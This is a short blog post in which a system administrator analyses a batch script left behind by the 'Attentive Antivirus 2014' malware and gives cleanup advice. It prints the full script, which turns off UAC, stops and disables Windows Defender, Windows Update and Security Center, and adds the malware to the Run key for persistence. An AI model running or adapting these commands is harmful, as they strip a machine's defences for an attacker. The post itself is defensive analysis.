Earlier this week, a computer was flagged by our security software as still infected. The malware was residing in C:ProgramDataaUs6sdpV with an executable of the same name as the folder. Symantec identified it as Suspicious.Cloud.5.A while others flagged it as AA2014 or Attentive Antivirus 2014 malware. More interesting than the executable itself which ComboFix was able to cleanup, a batch script was in the same directory as part of the malware. I copied it here in order to do a little analysis and learn from it.
Fortunately, it is a pretty straight-forward script but I find it interesting to see what malware authors seek to do.
[bash]
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem" /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem" /v EnableVirtualization /t REG_DWORD /d 0 /f
reg add "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f
sc stop windefend
sc stop msmpsvc
sc stop wuauserv
sc stop wscsvc
ping localhost -w 1000 -n 3 > nul
sc config windefend start= disabled
sc config msmpsvc start= disabled
sc config wuauserv start= disabled
sc config wscsvc start= disabled
sc config luafv start= disabled
ping localhost -w 1000 -n 2 > nul
reg delete HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v MSASCui /f
reg delete HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Windows Defender" /f
reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v AA2014 /t REG_SZ /d C:ProgramDataaUs6sdpVaUs6sdpV.exe[/bash]
Lines 1 -3 create registry keys where group policies are stored.
Lines 4-7 stop the Windows Defender, the Microsoft Anti-Malware, the Windows Update Service, and the Windows Security Center services, respectively.
Line 8 uses ping as a make-shift “sleep” functionality to ensure the services are stopped.
Lines 9-13 disable those same services in addition to luafv, a file system driver component that is apart of UAC.
Line 14 is another make-shift “sleep” through ping.
Lines 15 and 16 deletes Windows Defender from the Registry run key which starts the application up.
Line 17 adds the malware executable to the same location so it is launched with each start of Windows.
Conclusions
The tasks of this batch scrip makes it easy to reverse-engineer. While an anti-malware tool might remove only the malicious executable, these other files may still remain along with the changes to the registry. Clean up from the malware should consist of making sure the disabled services are configured back to their automatic or manual startup states and running. Windows Defender should be re-added to the Run key if it is used and to prevent errors, the malicious executable should be deleted from the HKLM Run key.
Because there can be so much going on after a malware infection, re-installing Windows is the most comprehensive way to ensure that the system is clean and back to its original configuration. A good series to read on the topic:
- https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
- https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+-+Part+2/15406
- https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+-+Part+3/15448
- https://isc.sans.edu/diary/Wipe+the+drive%21++Stealthy+Malware+Persistence+-+Part+4/15460
“Some people are of the opinion that people who “wipe the drive” when they are infected with malware lack the technical expertise and knowledge that is required to remove the malware. I’d argue that the opposite is true. It is the difference between unconscious incompetence and conscious incompetence. There, I said it. I am incompetent when it comes to finding everywhere malware could have hidden on a machine. Given enough time and energy I MIGHT find it all, but is that good enough? If that isn’t good enough then do as I do and just wipe the drive.”